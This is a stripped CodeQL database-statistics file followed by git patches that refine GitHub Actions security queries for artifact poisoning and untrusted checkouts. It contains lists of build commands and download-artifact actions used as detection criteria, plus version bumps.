+4 + + +5 +7 +2 + + +7 +11 +2 + + +12 +15 +2 + + +15 +16 +1 + + +18 +19 +2 + + +28 +31 +2 + + +52 +56 +2 + + +87 +88 +1 + + + + + + +tag +id + + +12 + + +1 +2 +2 + + +4 +5 +1 + + +15 +16 +1 + + +26 +27 +1 + + +35 +36 +1 + + +149 +150 +1 + + +654 +655 +1 + + + + + + +tag +kind + + +12 + + +1 +2 +8 + + + + + + +tag +parent + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +3 +4 +1 + + +25 +26 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +tag +idx + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +7 +8 +1 + + +9 +10 +1 + + +11 +12 +1 + + +23 +24 +1 + + + + + + +tag +tostring + + +12 + + +1 +2 +3 + + +2 +3 +1 + + +10 +11 +1 + + +13 +14 +1 + + +67 +68 +1 + + +223 +224 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +209 + + +2 +3 +42 + + +3 +6 +29 + + +6 +15 +25 + + +15 +18 +13 + + + + + + +tostring +kind + + +12 + + +1 +2 +318 + + + + + + +tostring +parent + + +12 + + +1 +2 +213 + + +2 +3 +41 + + +3 +6 +27 + + +6 +15 +25 + + +15 +18 +12 + + + + + + +tostring +idx + + +12 + + +1 +2 +272 + + +2 +3 +34 + + +3 +10 +12 + + + + + + +tostring +tag + + +12 + + +1 +2 +318 + + + + + + + + +yaml_anchors +1 + + +node +1 + + +anchor +1 + + + + +node +anchor + + +12 + + +1 +2 +1 + + + + + + +anchor +node + + +12 + + +1 +2 +1 + + + + + + + + +yaml_aliases +1 + + +alias +1 + + +target +1 + + + + +alias +target + + +12 + + +1 +2 +1 + + + + + + +target +alias + + +12 + + +1 +2 +1 + + + + + + + + +yaml_scalars +700 + + +scalar +700 + + +style +3 + + +value +241 + + + + +scalar +style + + +12 + + +1 +2 +700 + + + + + + +scalar +value + + +12 + + +1 +2 +700 + + + + + + +style +scalar + + +12 + + +14 +15 +1 + + +97 +98 +1 + + +589 +590 +1 + + + + + + +style +value + + +12 + + +12 +13 +1 + + +47 +48 +1 + + +183 +184 +1 + + + + + + +value +scalar + + +12 + + +1 +2 +158 + + +2 +3 +32 + + +3 +6 +19 + + +6 +15 +20 + + +15 +18 +12 + + + + + + +value +style + + +12 + + +1 +2 +240 + + +2 +3 +1 + + + + + + + + +yaml_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +yaml_locations +71 + + +locatable +71 + + +location +71 + + + + +locatable +location + + +12 + + +1 +2 +71 + + + + + + +location +locatable + + +12 + + +1 +2 +71 + + + + + + + + +xmlEncoding +39724 + + +id +39724 + + +encoding +1 + + + + +id +encoding + + +12 + + +1 +2 +39724 + + + + + + +encoding +id + + +12 + + +39724 +39725 +1 + + + + + + + + +xmlDTDs +1 + + +id +1 + + +root +1 + + +publicId +1 + + +systemId +1 + + +fileid +1 + + + + +id +root + + +12 + + +1 +2 +1 + + + + + + +id +publicId + + +12 + + +1 +2 +1 + + + + + + +id +systemId + + +12 + + +1 +2 +1 + + + + + + +id +fileid + + +12 + + +1 +2 +1 + + + + + + +root +id + + +12 + + +1 +2 +1 + + + + + + +root +publicId + + +12 + + +1 +2 +1 + + + + + + +root +systemId + + +12 + + +1 +2 +1 + + + + + + +root +fileid + + +12 + + +1 +2 +1 + + + + + + +publicId +id + + +12 + + +1 +2 +1 + + + + + + +publicId +root + + +12 + + +1 +2 +1 + + + + + + +publicId +systemId + + +12 + + +1 +2 +1 + + + + + + +publicId +fileid + + +12 + + +1 +2 +1 + + + + + + +systemId +id + + +12 + + +1 +2 +1 + + + + + + +systemId +root + + +12 + + +1 +2 +1 + + + + + + +systemId +publicId + + +12 + + +1 +2 +1 + + + + + + +systemId +fileid + + +12 + + +1 +2 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +1 + + + + + + +fileid +root + + +12 + + +1 +2 +1 + + + + + + +fileid +publicId + + +12 + + +1 +2 +1 + + + + + + +fileid +systemId + + +12 + + +1 +2 +1 + + + + + + + + +xmlElements +1270313 + + +id +1270313 + + +name +4655 + + +parentid +578021 + + +idx +35122 + + +fileid +39721 + + + + +id +name + + +12 + + +1 +2 +1270313 + + + + + + +id +parentid + + +12 + + +1 +2 +1270313 + + + + + + +id +idx + + +12 + + +1 +2 +1270313 + + + + + + +id +fileid + + +12 + + +1 +2 +1270313 + + + + + + +name +id + + +12 + + +1 +2 +420 + + +2 +5 +156 + + +5 +6 +3832 + + +6 +310317 +247 + + + + + + +name +parentid + + +12 + + +1 +2 +456 + + +2 +5 +150 + + +5 +6 +3829 + + +6 +161565 +220 + + + + + + +name +idx + + +12 + + +1 +2 +4358 + + +2 +35123 +297 + + + + + + +name +fileid + + +12 + + +1 +2 +486 + + +2 +5 +133 + + +5 +6 +3831 + + +6 +14503 +205 + + + + + + +parentid +id + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +name + + +12 + + +1 +2 +500482 + + +2 +3 +17866 + + +3 +4 +49117 + + +4 +45 +10556 + + + + + + +parentid +idx + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +fileid + + +12 + + +1 +2 +578021 + + + + + + +idx +id + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +name + + +12 + + +1 +2 +18457 + + +2 +3 +6533 + + +3 +4 +6178 + + +4 +8 +2624 + + +8 +4397 +1330 + + + + + + +idx +parentid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +fileid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +39722 +2083 + + + + + + +fileid +id + + +12 + + +1 +2 +20457 + + +2 +3 +3115 + + +3 +7 +3026 + + +7 +8 +3588 + + +8 +9 +2220 + + +9 +11 +3099 + + +11 +19 +3087 + + +19 +114506 +1129 + + + + + + +fileid +name + + +12 + + +1 +2 +20459 + + +2 +3 +3458 + + +3 +5 +2569 + + +5 +7 +2172 + + +7 +8 +6158 + + +8 +9 +3501 + + +9 +46 +1404 + + + + + + +fileid +parentid + + +12 + + +1 +2 +20457 + + +2 +3 +3870 + + +3 +5 +2152 + + +5 +6 +2876 + + +6 +7 +2720 + + +7 +8 +4132 + + +8 +14 +3096 + + +14 +31079 +418 + + + + + + +fileid +idx + + +12 + + +1 +2 +25894 + + +2 +3 +5301 + + +3 +4 +3787 + + +4 +6 +3268 + + +6 +35123 +1471 + + + + + + + + +xmlAttrs +1202020 + + +id +1202020 + + +elementid +760198 + + +name +3649 + + +value +121803 + + +idx +2000 + + +fileid +39448 + + + + +id +elementid + + +12 + + +1 +2 +1202020 + + + + + + +id +name + + +12 + + +1 +2 +1202020 + + + + + + +id +value + + +12 + + +1 +2 +1202020 + + + + + + +id +idx + + +12 + + +1 +2 +1202020 + + + + + + +id +fileid + + +12 + + +1 +2 +1202020 + + + + + + +elementid +id + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +name + + +12 + + +1 +2 +425778 + + +2 +3 +249579 + + +3 +4 +66475 + + +4 +2001 +18366 + + + + + + +elementid +value + + +12 + + +1 +2 +466237 + + +2 +3 +266291 + + +3 +46 +27670 + + + + + + +elementid +idx + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +fileid + + +12 + + +1 +2 +760198 + + + + + + +name +id + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +elementid + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +value + + +12 + + +1 +2 +3501 + + +2 +54146 +148 + + + + + + +name +idx + + +12 + + +1 +2 +3531 + + +2 +11 +118 + + + + + + +name +fileid + + +12 + + +1 +2 +3491 + + +2 +21768 +158 + + + + + + +value +id + + +12 + + +1 +2 +72032 + + +2 +3 +42366 + + +3 +199269 +7405 + + + + + + +value +elementid + + +12 + + +1 +2 +72036 + + +2 +3 +42374 + + +3 +199269 +7393 + + + + + + +value +name + + +12 + + +1 +2 +116722 + + +2 +2041 +5081 + + + + + + +value +idx + + +12 + + +1 +2 +117957 + + +2 +2001 +3846 + + + + + + +value +fileid + + +12 + + +1 +2 +86306 + + +2 +3 +28570 + + +3 +4175 +6927 + + + + + + +idx +id + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +elementid + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +name + + +12 + + +1 +2 +1955 + + +2 +189 +45 + + + + + + +idx +value + + +12 + + +1 +2 +1955 + + +2 +116643 +45 + + + + + + +idx +fileid + + +12 + + +1 +2 +1955 + + +2 +39449 +45 + + + + + + +fileid +id + + +12 + + +1 +2 +22884 + + +2 +4 +2565 + + +4 +6 +2294 + + +6 +7 +3299 + + +7 +9 +3272 + + +9 +16 +3143 + + +16 +129952 +1991 + + + + + + +fileid +elementid + + +12 + + +1 +2 +23890 + + +2 +4 +2131 + + +4 +5 +1971 + + +5 +6 +4096 + + +6 +8 +3519 + + +8 +16 +3137 + + +16 +106600 +704 + + + + + + +fileid +name + + +12 + + +1 +2 +22946 + + +2 +3 +2338 + + +3 +4 +2726 + + +4 +5 +2824 + + +5 +6 +2994 + + +6 +7 +3876 + + +7 +2002 +1744 + + + + + + +fileid +value + + +12 + + +1 +2 +22916 + + +2 +4 +2772 + + +4 +5 +2112 + + +5 +6 +3510 + + +6 +8 +1993 + + +8 +11 +3365 + + +11 +50357 +2780 + + + + + + +fileid +idx + + +12 + + +1 +2 +26133 + + +2 +3 +9699 + + +3 +5 +3511 + + +5 +2001 +105 + + + + + + + + +xmlNs +71201 + + +id +4185 + + +prefixName +958 + + +URI +4185 + + +fileid +39544 + + + + +id +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +id +URI + + +12 + + +1 +2 +4185 + + + + + + +id +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +prefixName +id + + +12 + + +1 +2 +915 + + +2 +4054 +43 + + + + + + +prefixName +URI + + +12 + + +1 +2 +915 + + +2 +4054 +43 + + + + + + +prefixName +fileid + + +12 + + +1 +2 +828 + + +2 +5 +73 + + +5 +24903 +57 + + + + + + +URI +id + + +12 + + +1 +2 +4185 + + + + + + +URI +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +URI +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +fileid +id + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + +fileid +prefixName + + +12 + + +1 +2 +11653 + + +2 +3 +25982 + + +3 +31 +1909 + + + + + + +fileid +URI + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + + + +xmlHasNs +1139730 + + +elementId +1139730 + + +nsId +4136 + + +fileid +39537 + + + + +elementId +nsId + + +12 + + +1 +2 +1139730 + + + + + + +elementId +fileid + + +12 + + +1 +2 +1139730 + + + + + + +nsId +elementId + + +12 + + +1 +5 +234 + + +5 +6 +3824 + + +6 +643289 +78 + + + + + + +nsId +fileid + + +12 + + +1 +5 +257 + + +5 +6 +3823 + + +6 +24759 +56 + + + + + + +fileid +elementId + + +12 + + +1 +2 +3669 + + +2 +3 +20429 + + +3 +7 +2536 + + +7 +8 +3473 + + +8 +9 +2258 + + +9 +11 +3036 + + +11 +18 +2966 + + +18 +147552 +1170 + + + + + + +fileid +nsId + + +12 + + +1 +2 +18261 + + +2 +3 +21032 + + +3 +8 +244 + + + + + + + + +xmlComments +26812 + + +id +26812 + + +text +22933 + + +parentid +26546 + + +fileid +26368 + + + + +id +text + + +12 + + +1 +2 +26812 + + + + + + +id +parentid + + +12 + + +1 +2 +26812 + + + + + + +id +fileid + + +12 + + +1 +2 +26812 + + + + + + +text +id + + +12 + + +1 +2 +21517 + + +2 +62 +1416 + + + + + + +text +parentid + + +12 + + +1 +2 +21519 + + +2 +62 +1414 + + + + + + +text +fileid + + +12 + + +1 +2 +21522 + + +2 +62 +1411 + + + + + + +parentid +id + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +text + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +fileid + + +12 + + +1 +2 +26546 + + + + + + +fileid +id + + +12 + + +1 +2 +26161 + + +2 +17 +207 + + + + + + +fileid +text + + +12 + + +1 +2 +26165 + + +2 +17 +203 + + + + + + +fileid +parentid + + +12 + + +1 +2 +26223 + + +2 +10 +145 + + + + + + + + +xmlChars +439958 + + +id +439958 + + +text +100518 + + +parentid +433851 + + +idx +4 + + +isCDATA +1 + + +fileid +26494 + + + + +id +text + + +12 + + +1 +2 +439958 + + + + + + +id +parentid + + +12 + + +1 +2 +439958 + + + + + + +id +idx + + +12 + + +1 +2 +439958 + + + + + + +id +isCDATA + + +12 + + +1 +2 +439958 + + + + + + +id +fileid + + +12 + + +1 +2 +439958 + + + + + + +text +id + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +parentid + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +idx + + +12 + + +1 +2 +100517 + + +2 +3 +1 + + + + + + +text +isCDATA + + +12 + + +1 +2 +100518 + + + + + + +text +fileid + + +12 + + +1 +2 +61284 + + +2 +4 +4205 + + +4 +5 +28328 + + +5 +351 +6701 + + + + + + +parentid +id + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +text + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +idx + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +isCDATA + + +12 + + +1 +2 +433851 + + + + + + +parentid +fileid + + +12 + + +1 +2 +433851 + + + + + + +idx +id + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +text + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +16 +17 +1 + + +100499 +100500 +1 + + + + + + +idx +parentid + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +isCDATA + + +12 + + +1 +2 +4 + + + + + + +idx +fileid + + +12 + + +4 +5 +1 + + +46 +47 +1 + + +97 +98 +1 + + +26494 +26495 +1 + + + + + + +isCDATA +id + + +12 + + +439958 +439959 +1 + + + + + + +isCDATA +text + + +12 + + +100518 +100519 +1 + + + + + + +isCDATA +parentid + + +12 + + +433851 +433852 +1 + + + + + + +isCDATA +idx + + +12 + + +4 +5 +1 + + + + + + +isCDATA +fileid + + +12 + + +26494 +26495 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +25303 + + +2 +35123 +1191 + + + + + + +fileid +text + + +12 + + +1 +2 +25765 + + +2 +35123 +729 + + + + + + +fileid +parentid + + +12 + + +1 +2 +25312 + + +2 +35123 +1182 + + + + + + +fileid +idx + + +12 + + +1 +2 +26397 + + +2 +5 +97 + + + + + + +fileid +isCDATA + + +12 + + +1 +2 +26494 + + + + + + + + +xmllocations +3051056 + + +xmlElement +2982460 + + +location +3051056 + + + + +xmlElement +location + + +12 + + +1 +2 +2978326 + + +2 +24903 +4134 + + + + + + +location +xmlElement + + +12 + + +1 +2 +3051056 + + + + + + + + +filetype +1102 + + +file +1102 + + +filetype +3 + + + + +file +filetype + + +12 + + +1 +2 +1102 + + + + + + +filetype +file + + +12 + + +1 +2 +1 + + +162 +163 +1 + + +939 +940 +1 + + + + + + + + +configs +69795 + + +id +69795 + + + + + +configNames +69794 + + +id +69794 + + +config +69794 + + +name +12859 + + + + +id +config + + +12 + + +1 +2 +69794 + + + + + + +id +name + + +12 + + +1 +2 +69794 + + + + + + +config +id + + +12 + + +1 +2 +69794 + + + + + + +config +name + + +12 + + +1 +2 +69794 + + + + + + +name +id + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + +name +config + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + + + +configValues +69691 + + +id +69691 + + +config +69691 + + +value +54399 + + + + +id +config + + +12 + + +1 +2 +69691 + + + + + + +id +value + + +12 + + +1 +2 +69691 + + + + + + +config +id + + +12 + + +1 +2 +69691 + + + + + + +config +value + + +12 + + +1 +2 +69691 + + + + + + +value +id + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + +value +config + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + + + +configLocations +209280 + + +locatable +209280 + + +location +209280 + + + + +locatable +location + + +12 + + +1 +2 +209280 + + + + + + +location +locatable + + +12 + + +1 +2 +209280 + + + + + + + + +extraction_time +378 + + +file +21 + + +extractionPhase +9 + + +timerKind +2 + + +time +43 + + + + +file +extractionPhase + + +12 + + +9 +10 +21 + + + + + + +file +timerKind + + +12 + + +2 +3 +21 + + + + + + +file +time + + +12 + + +3 +4 +21 + + + + + + +extractionPhase +file + + +12 + + +21 +22 +9 + + + + + + +extractionPhase +timerKind + + +12 + + +2 +3 +9 + + + + + + +extractionPhase +time + + +12 + + +1 +2 +8 + + +42 +43 +1 + + + + + + +timerKind +file + + +12 + + +21 +22 +2 + + + + + + +timerKind +extractionPhase + + +12 + + +9 +10 +2 + + + + + + +timerKind +time + + +12 + + +22 +23 +2 + + + + + + +time +file + + +12 + + +1 +2 +42 + + +21 +22 +1 + + + + + + +time +extractionPhase + + +12 + + +1 +2 +42 + + +8 +9 +1 + + + + + + +time +timerKind + + +12 + + +1 +2 +42 + + +2 +3 +1 + + + + + + + + +extraction_data +21 + + +file +21 + + +cacheFile +21 + + +fromCache +1 + + +length +21 + + + + +file +cacheFile + + +12 + + +1 +2 +21 + + + + + + +file +fromCache + + +12 + + +1 +2 +21 + + + + + + +file +length + + +12 + + +1 +2 +21 + + + + + + +cacheFile +file + + +12 + + +1 +2 +21 + + + + + + +cacheFile +fromCache + + +12 + + +1 +2 +21 + + + + + + +cacheFile +length + + +12 + + +1 +2 +21 + + + + + + +fromCache +file + + +12 + + +21 +22 +1 + + + + + + +fromCache +cacheFile + + +12 + + +21 +22 +1 + + + + + + +fromCache +length + + +12 + + +21 +22 +1 + + + + + + +length +file + + +12 + + +1 +2 +21 + + + + + + +length +cacheFile + + +12 + + +1 +2 +21 + + + + + + +length +fromCache + + +12 + + +1 +2 +21 + + + + + + + + + diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 82795df0006..4b8239b7f6c 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From ceac1c6392ff107ed5aea4a819f17abf7bfed141 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:53 +0200 Subject: [PATCH 0335/1267] Do not scan JS files --- .github/action/dist/index.js | 1 + .github/action/src/codeql.ts | 1 + 2 files changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe48..24092120560 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,6 +28684,7 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4c..fe2f9b49029 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,6 +121,7 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From a84c1c4706b4fcce446e96aa7ddd6befdc6d9265 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:15 +0200 Subject: [PATCH 0336/1267] Minor improvemnts --- .../actions/security/ArtifactPoisoningQuery.qll | 13 +++++++------ ql/lib/codeql/actions/security/PoisonableSteps.qll | 5 +++-- 2 files changed, 10 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 45d9a08d00a..060471bb5dc 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -20,12 +20,13 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep DownloadArtifactActionStep() { this.getCallee() = [ - "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", - "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", - "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", - "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", - "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", - "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "actions/download-artifact", "dawidd6/action-download-artifact", + "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", + "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", + "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", + "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", + "nmerget/download-gzip-artifact", "benday-inc/download-artifact", + "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" ] and diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 3349b5b1121..f80f09a32d8 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -19,10 +19,11 @@ class DangerousActionUsesStep extends PoisonableStep, UsesStep { private string dangerousCommands() { result = [ - "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar " + "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", + "poetry run" ] } From 4b4901f99f5c16ee1510ad16598a70b667ff875d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:51:46 +0200 Subject: [PATCH 0337/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6a247cee330..33c43429bd6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.0 +version: 0.1.1 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 05f3408c578..75624d6f199 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.0 +version: 0.1.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From bdaab69d0bb098395107c6300998c2d128c3e5e2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 15:09:37 +0200 Subject: [PATCH 0338/1267] Do not uses globs for source-root --- .github/action/dist/index.js | 1 - .github/action/src/codeql.ts | 1 - 2 files changed, 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 24092120560..7bb3039fe48 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28684,7 +28684,6 @@ async function codeqlDatabaseCreate(codeql) { } var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", "create", diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index fe2f9b49029..08c4b420a4c 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -121,7 +121,6 @@ export async function codeqlDatabaseCreate( var database_path = path.join(temp, "codeql-actions-db"); var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From 1fdf76ac4116b6089f17c88a16ddbe2b7bd9bce5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 15:17:46 +0200 Subject: [PATCH 0339/1267] Improve download artifact and untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 32 +++++++++++++------ .../security/UntrustedCheckoutQuery.qll | 19 +++++------ 2 files changed, 33 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 060471bb5dc..44c3c64a5a6 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -16,19 +16,33 @@ abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); } +class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + GitHubDownloadArtifactActionStep() { + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getCallee() = "actions/download-artifact" and + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { DownloadArtifactActionStep() { this.getCallee() = [ - "actions/download-artifact", "dawidd6/action-download-artifact", - "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", - "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", - "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", - "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", - "nmerget/download-gzip-artifact", "benday-inc/download-artifact", - "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", - "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", - "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" + "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", + "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", + "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", + "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action", + "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", + "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", + "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", + "ma-ve/action-download-artifact-with-retry" ] and ( not exists(this.getArgument(["branch", "branch_name"])) or diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ba31b0de500..a9c92e70ee5 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -93,7 +93,11 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt // 3rd party actions returning the PR head sha/ref exists(UsesStep step | ( - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", 